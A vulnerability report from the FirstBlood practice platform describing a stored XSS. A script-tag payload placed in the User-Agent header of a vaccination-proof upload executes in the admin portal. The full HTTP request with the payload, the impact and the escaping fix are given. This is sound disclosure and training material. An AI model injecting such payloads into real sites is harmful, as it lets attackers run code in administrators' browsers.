FirstBlood-#794 — Stored XSS via User-Agent header value in /vaccination-manager/portal.php
This issue was discovered on FirstBlood v2
On 2021-10-28, panya Level 7 reported:
The vaccination manager admin portal unsafely reflects a User-Agent header's value (saved to the DB when a user sends vaccination proof via /vaccination-manager/pub/submit-vaccination-proof.php
endpoint), which leads Stored XSS.
Example request:
POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Host: 13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Length: 66604
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6Ttb4gutNkKWWkV6
User-Agent: <script>alert(origin)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://13f5cfe96d8e-panya.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="email"
[email protected]
------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="vaccination_proof"; filename="pepe.png"
Content-Type: image/png
PNG
IHDR D
<skiped>
------WebKitFormBoundary6Ttb4gutNkKWWkV6--
Notice that I changed the User-Agent
header value to <script>alert(origin)</script>
.
The script tag is reflected in the vaccination-manager's admin portal and triggers an alert with the text "https://13f5cfe96d8e-panya.a.firstbloodhackers.com".
Impact:
An attacker could execute JS code on behalf of an vaccination-manager's admin.
Mitigation:
The User-Agent
header's value should be properly escaped or sanitized.
P2 High
Endpoint: /vaccination-manager/portal.php
Parameter: User-Agent
Payload: <script>alert(origin)</script>
FirstBlood ID: 29
Vulnerability Type: Stored XSS
When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.